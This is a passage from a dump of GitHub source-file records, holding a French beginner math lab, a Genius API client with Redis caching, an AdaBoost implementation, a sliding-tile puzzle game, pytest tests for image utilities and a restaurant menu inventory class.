text_extraction_status=%s WHERE source_url=%s\", [text, \"Success\", source_url])\n conn.commit()\n except Exception as e:\n c.execute(\"UPDATE articles SET text_extraction_status=%s WHERE source_url=%s\", [type(e).__name__, source_url])\n\n\n crawling_progress.inc(by=1)\n","repo_name":"ClaasM/VideoArticleRetrieval","sub_path":"src/data/articles/articles_to_text.py","file_name":"articles_to_text.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"38773458630","text":"import math\n\n\ndef inverse_additif(nombre):\n \"\"\"\n L'inverse additif d'un nombre.\n Trouve la valeur du nombre multiplié par -1.\n\n Args:\n nombre (float): Le nombre à inverser.\n Returns:\n float: L'inverse du nombre.\n\n Exemple:\n ::\n\n >> inverse_additif(45)\n -45\n\n ::\n\n >> inverse_additif(-4.5)\n 4.5\n\n \"\"\"\n\n return -nombre\n\n\ndef inverse_multiplicatif(nombre):\n \"\"\"\n L'inverse multiplicatif.\n Retourne la valeur à la puissance -1.\n\n Args:\n arg1 (float): La valeur dont on veut retourner l'inverse.\n Returns:\n float: L'inverse multiplicaitf de la valeur de départ.\n\n Exemple:\n ::\n\n >> inverse_multiplicatif(5)\n 0.2\n\n ::\n\n >> inverse_multiplicatif(0.25)\n 4\n\n \"\"\"\n\n return 1/nombre\n\n\ndef compteur_entre_borne(debut, fin):\n \"\"\"\n La somme en entre un borne minimale et une borne maximale.\n Ex : `debut + (debut+1) + ... + (fin-1) + fin`.\n Args:\n debut (float): La valeur de départ de la sommation à faire.\n fin (float): La valeur de fin de la sommation à faire.\n Returns:\n float: La somme du compteur entre les bornes données.\n Exemple:\n ::\n\n >> compteur_entre_borne(10, 13)\n 46\n\n ::\n\n >> compteur_entre_borne(0, 7)\n 28\n\n \"\"\"\n\n # Calcule la somme cumulative.\n somme = 0\n for i in range(debut,fin + 1):\n somme = somme + i\n return somme\n\n # NOTE: Une autre réponse sans l'utilisation de la boucle.\n # La légende dit que que l'équation fut trouvé par Carl Friedrich Gauss\n # durant sont enfance.\n # http://bit-player.org/wp-content/extras/gaussfiles/gauss-snippets.html\n # reponse = (fin - debut + 1) * (debut + fin) / 2;\n\n\ndef factoriel(n):\n \"\"\"\n Factoriel de n. 
Retourne la somme multiplicative de 1 à n.\n\n Args:\n n (float): La valeur pour laquelle on souhaite calculer le factoriel.\n Returns:\n float: La somme multiplicative factoriel du nombre.\n \n Exemple:\n ::\n\n >> factoriel(5)\n 120\n\n \"\"\"\n\n # Trouve la somme cummulative multiplicative de 1 à n.\n fact = 1\n for indice in range(2, n + 1):\n fact = fact * indice\n return fact\n\n\ndef saisit_entre_borne(minimum, maximum):\n \"\"\"\n Saisi une valeur et recommence tant que la saisit n'est pas à\n l'intérieur de bornes données.\n \n Args:\n minimum (float): La borne inférieure de l'intervalle de saisi.\n maximum (float): La borne supérieure de l'intervalle de saisi.\n Returns:\n float: La valeur finalement saisit entre les bornes.\n \n Exemple:\n ::\n \n >> saisit_entre_borne(5, 10)\n Veuillez entrer une valeur : 3\n La valeur doit se situer entre 5 et 10.\n Veuillez entrer une valeur : 12\n La valeur doit se situer entre 5 et 10.\n Veuillez entrer une valeur : 5\n 5\n\n \"\"\"\n\n # Saisit le premier nombre.\n saisit = float(input('Veuillez entrer une valeur : '))\n\n # Tant qu'on dépasse une des bornes.\n while (saisit < minimum or saisit > maximum):\n # Recommence la saisie.\n print('La valeur doit se situer entre', minimum, 'et', maximum)\n saisit = float(input('Veuillez entrer une valeur : '))\n return saisit\n\n\ndef maximum_de_deux(nb1, nb2):\n \"\"\"\n Le nombre maximum entre deux nombres.\n\n Args:\n nb1 (float): Première valeur a comparer.\n nb2 (float): Seconde valeur a comparer.\n Returns:\n float: La valeur maximum entre les deux nombres.\n\n Exemple:\n ::\n\n >> maximum_de_deux(3, 5)\n 5\n\n ::\n\n >> maximum_de_deux(34, 34)\n 34\n\n \"\"\"\n\n # Trouve le plus grand nombre.\n if nb1 > nb2:\n return nb1\n else:\n return nb2\n\n\ndef maximum_de_trois(nb1, nb2, nb3):\n \"\"\"\n Le nombre maximum entre trois nombres.\n\n Args:\n nb1 (float): Première valeur a comparer.\n nb2 (float): Seconde valeur a comparer.\n nb3 (float): Troisième valeur à comparer.\n Returns:\n float: La valeur maximum entre les trois nombres.\n\n Exemple:\n ::\n\n >> maximum_de_trois(3, 5, 2)\n 5\n\n ::\n\n >> maximum_de_trois(34, 34, 34)\n 34\n\n ::\n\n >> maximum_de_trois(34, 5, 34)\n 34\n\n \"\"\"\n\n # Utilise la fonction précédente pour simplifier le problème.\n return maximum_de_deux(maximum_de_deux(nb1,nb2), nb3)\n\n\ndef maximum_de_quatre(nb1, nb2, nb3, nb4):\n \"\"\"\n Le nombre maximum entre quatrew nombres.\n\n Args:\n nb1 (float): Première valeur a comparer.\n nb2 (float): Seconde valeur a comparer.\n nb3 (float): Troisième valeur à comparer.\n nb4 (float): Quatrième valeur à comparer.\n Returns:\n float: La valeur maximum entre les quatre nombres.\n\n Exemple:\n ::\n >> maximum_de_quatre(3, 5, 2, 1)\n 5\n\n ::\n >> maximum_de_quatre(34, 34, 34, 34)\n 34\n\n ::\n >> maximum_de_quatre(34, 5, 34, 45)\n 45\n\n \"\"\"\n\n # Utilise la fonction précédente pour simplifier le problème.\n return maximum_de_deux(maximum_de_deux(nb1, nb2), maximum_de_deux(nb3, nb4))\n\n\ndef pgcd(a, b):\n \"\"\"\n Le plus grand commun diviseur entre deux nombre. 
Utilise\n l'algorithme suivant pour y arriver:\n\n ::\n\n tant que b diférent de 0\n si a plus grand que b alors\n a := a - b\n sinon\n b := b - a\n fin si\n fin tant que\n résultat := a\n\n Le signe `:=` est une assignation en algorithmie.\n\n Args:\n a (float): Première valeur.\n b (float): Deuxième valeur.\n Returns:\n float: Plus grand diviseur des deux nombres.\n\n Exemple:\n ::\n\n >> pgcd(12, 30)\n 6\n\n ::\n\n >> pgcd(8, 4)\n 4\n\n \"\"\"\n\n # Utilise l'algorithme fourni pour trouver les plus grand diviseur.\n while b != 0:\n if a > b:\n a = a - b\n else:\n b = b - a\n\n return a\n\n\ndef est_premier(n):\n \"\"\"\n Détermine si le nombre est premier.\n Retourne `true` si le nombre est premier, `false` autrement.\n \n Args:\n n (float): Le nombre à tester.\n Returns:\n float: `true` si le nombre est premier.\n \n Exemple:\n ::\n \n >> est_premier(4)\n False\n \n ::\n \n >> est_premier(7)\n True\n\n \"\"\"\n\n # Test des cas particuliers.\n if (n == 2):\n premier = True\n elif (n == 1 or n % 2 == 0):\n premier = False\n else:\n # Suppose que le nombre est premier.\n premier = True\n\n # Vérifie tous les diviseurs impairs entre 2 et sqrt(n).\n # Note : une propriété mathématique nous permet de tester jusqu'à\n # sqrt(n) pour augmenté la rapidité de la fonction.\n racineN = math.sqrt(n)\n indice = 3\n while indice <= racineN and premier == True:\n # Si on trouve un diviseur, alors il n'est pas premier.\n if n % indice == 0:\n premier = False\n #Saut de 2 pour sauter le prochain nombre pair.\n indice = indice + 2\n\n return premier\n\n\ndef affiche_n_nombre_premier(n):\n \"\"\"\n Affiche les n nombres premiers dans la fenêtre de commande.\n\n Args:\n n (float): Le nombre de nombre premiers à afficher.\n\n Exemple:\n ::\n\n >> affiche_n_nombre_premier(4)\n 1 ieme nombre premier : 2.\n 2 ieme nombre premier : 3.\n 3 ieme nombre premier : 5.\n 4 ieme nombre premier : 7.\n\n \"\"\"\n\n # Compte le nombre généré.\n nAffiche = 0\n i = 1\n while nAffiche < n:\n # Trouve si le prochain indice est premier.\n if est_premier(i):\n # Affiche et garde compte du nombre afficher.\n nAffiche = nAffiche + 1\n print(nAffiche, 'ieme nombre premier : ', i)\n i = i + 1\n\n\ndef n_diviseur(n):\n \"\"\"\n Le nombre de diviseurs de n.\n\n Args:\n n (float): Le nombre à tester.\n Returns:\n float: Le nombre de diviseurs du nombre.\n\n Exemple:\n ::\n\n >> n_diviseur(45)\n 6\n\n ::\n\n >> n_diviseur(8)\n 4\n\n \"\"\"\n\n # Teste tous les diviseurs possibles.\n # Inclus 1 automatique pour augmenter l'efficaciter de la fonction.\n diviseurs = 1\n indice = 2\n while (indice <= n):\n if n % indice == 0:\n diviseurs = diviseurs + 1\n indice = indice + 1\n return diviseurs\n\n # Note : On pourrait résoudre le problème grâce à la fonction Phi\n # d'Euler qui dit que le nombre de diviseurs d'un nombre\n # est égal au produit des exposants + 1 de sa représentation\n # en nombre premiers.\n # Ex. 
: 200 = 2^3 * 5^2\n # Phi(200) == 4 * 3 == 12 == nDiviseurs\n\n","repo_name":"dullin/hololink-site","sub_path":"content/INF1035/laboratoires/labo3/labo3.py","file_name":"labo3.py","file_ext":"py","file_size_in_byte":9061,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"37079560157","text":"import json\nfrom datetime import datetime, timedelta\n\nimport redis\nimport requests\n\nfrom confitec.ext.database import Artists, resource\n\ncache = redis.Redis(host=\"redishost\", port=6379, decode_responses=True)\n\n\nclass GeniusAPI:\n def __init__(self, headers):\n self.headers = headers\n self.BASE_API = \"https://api.genius.com/search\"\n\n def get_songs(self, artist_name, in_cache=True):\n artists = Artists(resource)\n expiration_time = 7 * 86400 \n\n if in_cache:\n songs = cache.get(artist_name.replace(\" \", \"-\"))\n if songs == None:\n response = requests.get(\n f\"{self.BASE_API}\",\n params={\"q\": artist_name},\n headers=self.headers,\n ).json()\n\n cache.set(\n artist_name.replace(\" \", \"-\"), json.dumps(response[\"response\"])\n )\n cache.expire(artist_name.replace(\" \", \"-\"), expiration_time)\n\n return response[\"response\"]\n return json.loads(songs)\n\n response = requests.get(\n f\"{self.BASE_API}\",\n params={\"q\": artist_name},\n headers=self.headers,\n ).json()\n\n if response[\"meta\"][\"status\"] == 200:\n if not artists.find_one(artist_name):\n artists.save(artist_name)\n cache.set(\n artist_name.replace(\" \", \"-\"), json.dumps(response[\"response\"])\n )\n cache.expire(artist_name.replace(\" \", \"-\"), expiration_time)\n\n return response[\"response\"]\n","repo_name":"carmo-sousa/Confitec","sub_path":"confitec/services/genius.py","file_name":"genius.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"4049512926","text":"\nclass Solution:\n\n def isValidParenthesis(self, parentheses):\n\n stack = []\n for paren in parentheses:\n if stack == [] and paren == \")\":\n return False\n\n if paren == \"(\":\n stack.append(\"(\")\n else:\n stack.pop()\n\n return stack == []\n\n def generateParentheses(self, n):\n DP = [[\"(\"]]\n\n # Why n*2? -> if n = 3, there will be n*2=6 total parentesis in a valid combination. Ex. ((())), ()()()\n # Why n-1? -> The first parent \"(\" is already added in DP. So if n = 3, we only need to add 5 more parentesis. Ex. 
( -> ()()(), ( -> ((()))\n parenthesesToAdd = n * 2 - 1\n\n for i in range(parenthesesToAdd):\n DP.append([])\n for paren in [\"(\", \")\"]:\n for combination in DP[i]:\n DP[i+1].append(combination + paren)\n\n validParenthesis = []\n for combination in DP[-1]:\n if not self.isValidParenthesis(combination):\n continue\n\n validParenthesis.append(combination)\n\n return validParenthesis\n\n\nsolution = Solution().generateParentheses(3)\n\nprint(solution)\n","repo_name":"kevin-a-nelson/leetcodePath","sub_path":"GenerateParentheses/GenerateParentheses.py","file_name":"GenerateParentheses.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"21916640790","text":"from pathlib import Path\n\nimport pytest\n\nfrom PIL import Image\n\nfrom ksvd import utils\n\n\n@pytest.fixture\ndef image_path(tmp_path) -> str:\n \"\"\"\n Create a random image and return the path to it.\n \"\"\"\n image = Image.new(\"RGB\", (112, 112))\n path = tmp_path / \"test.png\"\n image.save(path)\n return str(path)\n\n\ndef test_load_patches(image_path: str) -> None:\n \"\"\"\n Test load_image function.\n \"\"\"\n image = utils.load_image(image_path, rgb=False)\n assert image.shape == (112, 112)\n\n patches = utils.image_to_patches(image, 8)\n assert patches.shape == (196, 64)\n\n\ndef test_load_dataset_from_dir(image_path: str) -> None:\n \"\"\"\n Test load_dataset_from_dir function.\n \"\"\"\n folder = Path(image_path).parent\n dataset = utils.load_dataset_from_dir(folder, 8)\n assert dataset.shape == (196, 64)\n","repo_name":"guyshapira-academic/K-SVD","sub_path":"tests/utils_test.py","file_name":"utils_test.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"25894150196","text":"# -*- coding: utf-8 -*-\n\"\"\"Module docstring.\n\nauthor: ferris\nupdate: 2015-11-21\nfunction: AdaBoost discriminative model, based on the CART algorithm in ml_decision_trees.py\n\n\"\"\"\n\nimport numpy as np\nimport ml_decision_tree as dts\n\n\nclass AdaBoost:\n def __init__(self, rows):\n self.rows = rows\n self.y = [r[len(rows[0]) - 1] for r in rows] # sample y labels\n self.trees = []\n self.m = len(rows) # sample size\n self.alpha = None\n\n def train(self, k=50, th=0.0, d=2):\n \"\"\"\n Train in a loop, producing self.trees and self.alpha\n :param k: number of boosting rounds\n :param th: threshold passed to dts.train_cart\n :param d: tree depth, passed to dts.train_cart\n :return:\n \"\"\"\n self.alpha = np.repeat([0.0], k) # initialize tree weights as floats\n weight = np.repeat([1 / self.m], self.m) # initialize sample weights\n\n for i in range(k):\n\n # first training pass\n # bootstrap sampling\n sample_indices = np.random.choice(range(self.m), size=self.m, replace=True, p=weight)\n sampled = [self.rows[i] for i in sample_indices]\n tree = dts.train_cart(sampled, th=th, d=d, sample=False)\n predicted = dts.predict(tree, self.rows, out=\"value\") # predict on the original samples\n err_vec = np.where(np.array(self.y) != np.array(predicted), 1, 0)\n err_rate = (1 / self.m) * err_vec.dot(weight) # error rate\n\n # error rate above 0.5, retrain\n while err_rate > 0.5:\n weight = np.repeat([1 / self.m], self.m) # reset weights\n # bootstrap sampling\n sample_indices = np.random.choice(range(self.m), size=self.m, replace=True, p=weight)\n sampled = [self.rows[i] for i in sample_indices]\n tree = dts.train_cart(sampled, th=th, d=d, sample=False)\n predicted = dts.predict(tree, self.rows, out=\"value\") # predict on the original samples\n err_vec = np.where(np.array(self.y) != np.array(predicted), 1, 0)\n err_rate = (1 / self.m) * err_vec.dot(weight) # error rate\n\n self.alpha[i] = 0.5 * np.log((1 - err_rate) / err_rate) # update tree weight\n weight *= np.exp(self.alpha[i] * err_vec) # update sample weights\n weight /= np.sum(weight) # normalize sample weights\n self.trees.append(tree) # store the tree\n\n def predict(self, rows_new):\n \"\"\"\n For each tree's prediction, accumulate its weight from self.alpha and return the y label with the highest total weight\n :param rows_new: data to predict\n :return: AdaBoost-predicted y labels\n \"\"\"\n results = []\n for r in rows_new:\n y_dic = {} # key: predicted y label; value: tree weight\n for i in range(len(self.trees)):\n t = self.trees[i]\n p = dts.predict_single(t, r, out=\"value\")\n y_dic[p] = y_dic.get(p, 0) + self.alpha[i] # accumulate the weight of each y label\n weighed_p = dts.topkey(y_dic)\n results.append(weighed_p)\n return results\n\n def test(self, rows_test):\n \"\"\"\n :param rows_test: test data\n :return: error rate\n \"\"\"\n l = len(rows_test[0]) - 1\n predicted = self.predict(rows_test)\n actual = [r[l] for r in rows_test]\n err = sum(np.array(predicted) != np.array(actual))\n err_rate = float(err) / len(rows_test)\n print(\"error rate: {0}\".format(str(err_rate)))\n return err_rate\n\n\n# ad = AdaBoost(dts.my_data)\n# ad.train(k=30)\n# ad.predict(dts.my_data)\n# ad.test(dts.my_data)\n","repo_name":"ferris-wufei/algorithm_ml","sub_path":"ml_Adaboost.py","file_name":"ml_Adaboost.py","file_ext":"py","file_size_in_byte":3561,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"}
+{"seq_id":"6191333964","text":"import random\r\n\r\nprint(\"\"\"Welcome to zzy's game! The board has an empty space where \r\nan adjacent tile can be slid to. The objective of the game \r\nis to rearrange the tiles into a sequential order by their\r\nnumbers (left to right, top to bottom) by repeatedly making\r\nsliding moves (left, right, up or down).\"\"\")\r\n# Ask the player to enter the dimension of the puzzle he or she wants to play.\r\nwhile True:\r\n g_dimension = input('enter the dimension you want to play(3-10)>')\r\n if g_dimension.isdigit() and (2 < int(g_dimension) < 11): # check whether it is a correct number\r\n g_dimension = int(g_dimension)\r\n break\r\n else:\r\n print('Invalid input! Please check your input.')\r\n# Allow the player to define the letters that control the moves\r\nwhile True:\r\n g_define = input(\r\n 'Enter the four letters used for left, right, up and down directions>')\r\n g_define = list(g_define.split()) # split the letters\r\n # make a set to check whether any letter is repeated\r\n g_define_lst = set(g_define)\r\n if ((len(g_define_lst) == len(g_define)) and len(g_define) == 4\r\n and all([word in [chr(i) for i in range(97, 123)] for word in g_define])): # check whether the input is lowercase letters\r\n break\r\n else:\r\n print('Invalid input! Please check your input.')\r\n# define the direction order\r\ng_right = g_define[1]\r\ng_left = g_define[0]\r\ng_up = g_define[2]\r\ng_down = g_define[3]\r\ng_times = 0 # Create a variable to track the number of moves the player makes.\r\n# Make an empty list in order to put numbers and space in a random order.\r\ng_numbers = []\r\n# Make an empty list in order to put numbers and space in the correct order.\r\ng_numbers_sorted = []\r\n# put the numbers in two lists in correct order.\r\nfor g_number in range(1, g_dimension**2):\r\n g_numbers.append(g_number)\r\n g_numbers_sorted.append(g_number)\r\n# put the space in both lists\r\ng_numbers.append(' ')\r\ng_numbers_sorted.append(' ')\r\n\r\n\r\ndef create_random_number(): # shuffle the first list of numbers\r\n while True:\r\n random.shuffle(g_numbers)\r\n position = g_numbers.index(' ')\r\n if g_dimension % 2 == 1 and get_inversion_number() % 2 == 0 \\\r\n and g_numbers != g_numbers_sorted:\r\n output_number() # if the dimension is odd, the inversion number must be even\r\n break\r\n elif (g_dimension % 2 == 0 and (position//g_dimension +\r\n get_inversion_number()) % 2 == 1 and g_numbers != g_numbers_sorted):\r\n output_number() # if the dimension is even, the row of the space plus the inversion number must be odd\r\n break\r\n\r\n\r\ndef get_inversion_number(): # figure out the inversion number of the random list\r\n inversion_number = 0\r\n position = g_numbers.index(' ')\r\n del g_numbers[position]\r\n # figure out the inversion number\r\n for i in range(0, (g_dimension**2-2)):\r\n for m in range(i+1, g_dimension**2-1):\r\n if g_numbers[i] > g_numbers[m]:\r\n inversion_number += 1\r\n g_numbers.insert(position, ' ')\r\n return inversion_number\r\n\r\n\r\ndef output_number(): # print out the numbers and the space in the right format\r\n for n in range(1, g_dimension+1):\r\n line_n = g_numbers[(n-1)*g_dimension: n*g_dimension]\r\n for i in range(0, g_dimension): # print the numbers line by line\r\n # if the number<10 or a space, print two spaces in order to align\r\n if line_n[i] == ' ' or int(line_n[i]) < 10:\r\n print(line_n[i], end=(' '*2))\r\n else:\r\n # for a number bigger than 10, print with one space\r\n print(line_n[i], end=(' '))\r\n print('') # finally print an empty string to start a new line.\r\n\r\n\r\ndef input_order(): # allow the player to enter the direction to move\r\n while True:\r\n # find the position of the space, and make a list of valid orders\r\n position = g_numbers.index(' ')\r\n order_list = ['Enter your move(', 'left-', g_left, ', right-',\r\n g_right, ', up-', g_up, ', down-', g_down, ')>']\r\n # delete the invalid orders\r\n if -1 < position < g_dimension:\r\n order_list.remove(', down-')\r\n order_list.remove(g_down)\r\n if position % g_dimension == 0:\r\n order_list.remove(', right-')\r\n order_list.remove(g_right)\r\n if (position+1) % g_dimension == 0:\r\n order_list.remove('left-')\r\n order_list.remove(g_left)\r\n if ((g_dimension-1)*g_dimension) <= position <= g_dimension**2:\r\n order_list.remove(', up-')\r\n order_list.remove(g_up)\r\n if (position+1) % g_dimension != 0: # if the left order is valid, just print the list\r\n for order_l in order_list:\r\n print(order_l, end='')\r\n else: # if the left order is invalid, we need to delete ', ' from the first valid order\r\n order_list[1] = order_list[1][2:]\r\n for order_l in order_list:\r\n print(order_l, end='')\r\n order = input() # allow the player to enter the order\r\n # create a list of the valid orders to make sure that the player enters a valid order\r\n correct_input = []\r\n for x in range(1, len(order_list)):\r\n if x % 2 == 0:\r\n correct_input.append(order_list[x]) # store the valid orders\r\n if order not in correct_input: # if the player enters an invalid order, remind him or her\r\n print('Invalid input! Please check your input.')\r\n continue\r\n return order\r\n\r\n\r\ndef move(): # follow the player's order to make a move.\r\n order = input_order()\r\n # find the position of the space before this move\r\n position = g_numbers.index(' ')\r\n # exchange the position of the space and the surrounding number\r\n if order == g_left:\r\n g_numbers[position], g_numbers[position + 1] = \\\r\n g_numbers[position+1], g_numbers[position]\r\n elif order == g_right:\r\n g_numbers[position-1], g_numbers[position] = \\\r\n g_numbers[position], g_numbers[position-1]\r\n elif order == g_up:\r\n g_numbers[position], g_numbers[position + g_dimension] = \\\r\n g_numbers[position+g_dimension], g_numbers[position]\r\n elif order == g_down:\r\n g_numbers[position-g_dimension], g_numbers[position] = \\\r\n g_numbers[position], g_numbers[position-g_dimension]\r\n output_number() # print the list of numbers in correct order\r\n\r\n\r\ndef continue_the_game(): # the main process of the game\r\n create_random_number() # create a solvable number list\r\n while True:\r\n global g_times\r\n # if the player solves the puzzle successfully, end the loop\r\n if g_numbers == g_numbers_sorted and g_times != 1:\r\n print('Congratulations! You solved the puzzle in ' +\r\n str(g_times) + ' moves.')\r\n break\r\n elif g_numbers == g_numbers_sorted and g_times == 1:\r\n print('Congratulations! You solved the puzzle in ' +\r\n str(g_times) + ' move.')\r\n break\r\n # if the puzzle is not solved yet, make a move, count it and continue\r\n else:\r\n move()\r\n g_times += 1\r\n\r\n\r\ncontinue_the_game() # begin the game\r\n\r\nwhile True: # if the player finishes the game, ask whether they want to play again.\r\n q_or_n = input(\r\n 'Enter ‘n’ to start a new game or enter ‘q’ to end the game >')\r\n if q_or_n == 'n':\r\n g_times = 0 # restart g_times\r\n continue_the_game()\r\n elif q_or_n == 'q': # withdraw from the program\r\n exit()\r\n else: # if the player enters something else, give him or her a reminder.\r\n print('Invalid input! 
Please check your input.')\r\n","repo_name":"cragramer/Klotski","sub_path":"Klotski_Source.py","file_name":"Klotski_Source.py","file_ext":"py","file_size_in_byte":7829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"40305962382","text":"from src.item import MenuItem, MainMenuItem, MeasuredMenuItem, BaseMenuItem, MainOrderItem\nimport pickle\nfrom src.item import OrderException\n\n#class to represent the Menu and Inventory\nclass Menu:\n\tdef __init__(self):\n\t\tself._items = {}\n\t\n\t#functions to add items to the menu\t\n\tdef add_main(self, name, price, stock_quantity, food_type, ingredients):\n\t\tself._items[name] = MainMenuItem(name, price, stock_quantity, food_type, ingredients)\t\n\n\tdef add_measured_item(self, name, price, stock_quantity, food_type, serving_size, base_item):\n\t\tself._items[name] = MeasuredMenuItem(name, price, stock_quantity, food_type, serving_size, base_item)\t \n \n\tdef add_menu_item(self, name, price, stock_quantity, food_type, main, ing_type):\n\t\tself._items[name] = MenuItem(name, price, stock_quantity, food_type, main, ing_type) \n \n\tdef add_base_item(self, name, price, stock_quantity, food_type, related_items):\n\t\tself._items[name] = BaseMenuItem(name, price, stock_quantity, food_type, related_items)\n \n #function to set the quantity of measured items from base items\t e.g. set quantity of \"small nuggets\", \"medium nuggets\" and \"large nuggets\" from \"nuggets\". base_item is a str\n\tdef set_quantity(self, base_item):\n\t\t#not an item on the menu\n\t\tif not base_item in self._items:\n\t\t\treturn False\t\n\t\t#not a BaseMenuIte\t\n\t\tif not isinstance(self._items[base_item], BaseMenuItem):\n\t\t\treturn False\n\t\trelated_items = self._items[base_item].related_items\t\n\t\ttotal_quantity = self._items[base_item].stock_quantity\t\n\t\tfor item in related_items:\n\t\t\tserving_size = self._items[item].serving_size\n\t\t\tnew_quantity = total_quantity / serving_size\n\t\t\t#if new quantity is < 1, new quantity = 0\n\t\t\tif new_quantity < 1:\n\t\t\t\tnew_quantity = 0\n\t\t\tself._items[item].stock_quantity = new_quantity\n\t\treturn True \n\n\t#function to decrement stock quantity after an order is placed. items is a list of strings and MainOrderItems\n\tdef dec_inventory(self, items):\n\t\tfor item in items:\n\t\t\tif isinstance(item, MainOrderItem):\n\t\t\t\tingredients = item.ingredients\n\t\t\t\tfor key, value in ingredients.items():\n\t\t\t\t\tcount = value\n\t\t\t\t\tself._items[key].stock_quantity -= count\n\t\t\telif isinstance(item, MeasuredMenuItem):\n\t\t\t\tbase_item_name = self._items[item.name].base_item\n\t\t\t\tbase_item = self._items[base_item_name]\n\t\t\t\tserving_size = self._items[item.name].serving_size\n\t\t\t\tself._items[base_item.name].stock_quantity -= serving_size\n\t\t\t\tself.set_quantity(base_item)\n\t\t\telif isinstance(item, MenuItem):\n\t\t\t\tself._items[item.name].stock_quantity -= 1\n\n\t\tself.save_inventory()\t\t\n\t\treturn\t\n\n\t#function to check whether we have enough stock to fulfil an order. 
items is a list of MeasuredItems and MainOrderItems\n\t# returns a dictionary of items that are insufficient to complete order\n\t# [item.name] = stock levels\n\tdef check_enough_inventory(self, items):\n\t\tinsufficient = {}\n\t\ttotal = {}\n\t\tfor item in items:\n\t\t\tif isinstance(item, MainOrderItem):\n\t\t\t\tingredients = item.ingredients\n\t\t\t\tfor key, value in ingredients.items():\n\t\t\t\t\tif key not in total.keys():\n\t\t\t\t\t\ttotal[key] = value\n\t\t\t\t\telse:\n\t\t\t\t\t\ttotal[key] += value\n\t\t\telse:\n\t\t\t\tif item.name not in total.keys():\n\t\t\t\t\ttotal[item.name] = items.count(item)\n\t\t# print(total)\n\t\tfor key, value in total.items():\n\t\t\tif not key in self._items:\n\t\t\t\traise OrderException(\"{0} is not a valid ingredient\".format(key))\n\t\t\tif value > self._items[key].stock_quantity:\n\t\t\t\tinsufficient[key] = self._items[key].stock_quantity\n\t\treturn insufficient\n\n\t#function to set the quantity of base wrap and base burger based on the least available ingredient\n\tdef set_main_quantity(self, main_item):\n\t\tingredients = self.get_item(main_item).ingredients\n\t\tquantity = self.get_stock_quantity(ingredients[0])\n\t\tfor ingredient in ingredients:\n\t\t\tcount = ingredients.count(ingredient)\n\t\t\tif (self.get_stock_quantity(ingredient) / count) < quantity:\n\t\t\t\tquantity = self.get_stock_quantity(ingredient) / count\n\t\tself.set_stock_quantity(main_item, quantity)\n\t\treturn\n\n\tdef display(self):\n\t\treturn self._items.values()\n \t\n\tdef print_menu(self):\n\t\tfor item in self._items.keys():\n\t\t\tprint(self.get_item(item))\n \t\t \t\t\n\tdef get_item(self, name):\n\t\treturn self._items[name] \n \t\n\tdef get_items(self):\n\t\treturn self._items\n\t\t\n\t#function that returns the quantity of an item in string format\n\tdef get_stock_quantity(self, name):\n\t\tquantity = self.get_item(name).stock_quantity\n\t\treturn quantity\n\n\t#function that sets the quantity of an item in string format\n\tdef set_stock_quantity(self, name, quantity):\n\t\tself.get_item(name).stock_quantity = quantity\n\t\treturn \n\t\t\n\t#function to refill inventory to full\n\tdef refill_inventory(self):\n\t\tfor item in self._items.keys():\n\t\t\tif self.get_item(item).food_type == \"ingredient\":\n\t\t\t\tself.set_stock_quantity(item, 1000)\n\t\t\telif isinstance(self.get_item(item), BaseMenuItem):\n\t\t\t\tself.set_stock_quantity(item, 10000)\n\t\tself.set_main_quantity(\"baseburger\")\n\t\tself.set_main_quantity(\"base wrap\")\t\t\n\t\tself.set_quantity(\"nugget\")\n\t\tself.set_quantity(\"fries\")\n\t\tself.set_quantity(\"orange juice\")\n\t\tself.set_quantity(\"sundae\")\n\t\tself.save_inventory()\n\t\treturn\n\t\t\n\t#function to return a list of mains on the menu only\n\tdef get_mains(self):\n\t\tmains = []\n\t\tfor item in self._items.keys():\n\t\t\tif self.get_item(item).food_type == \"main\":\n\t\t\t\tmains.append(self.get_item(item))\n\t\treturn mains\n\t\n\t#function to return a list of ingredients on the menu only\n\tdef get_ingredients(self, type=None):\n\t\tingredients = []\n\t\tfor item in self._items.keys():\n\t\t\tif self.get_item(item).food_type == \"ingredient\":\n\t\t\t\tif type == None:\n\t\t\t\t\tingredients.append(self.get_item(item))\n\t\t\t\telif self.get_item(item).main_type.find(type) != -1:\n\t\t\t\t\tingredients.append(self.get_item(item))\n\t\treturn ingredients\n\t\n\t#function to return a list of the type measured items given in the input\n\tdef get_measured_item(self, measuredItem):\n\t\tmenu = []\n\t\tfor item 
in self._items.keys():\n\t\t\tif self.get_item(item).food_type == measuredItem and not isinstance(self.get_item(item), BaseMenuItem):\n\t\t\t\tmenu.append(self.get_item(item))\n\t\treturn menu\n\n\t# returns the price of an item given an input string\n\tdef get_price(self, name):\n\t\tfor item in self._items.keys():\n\t\t\tif self.get_item(item).name == name:\n\t\t\t\treturn self.get_item(item).price\n\t\n\t#function to write current inventory out\t\t\t\n\tdef save_inventory(self):\n\t\twith open(\"inventory.pickle\", \"wb\") as f:\n\t\t\tpickle.dump(self, f)\n\t\treturn\n\n","repo_name":"houdeanie/c1531-Burger-site","sub_path":"src/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":6380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
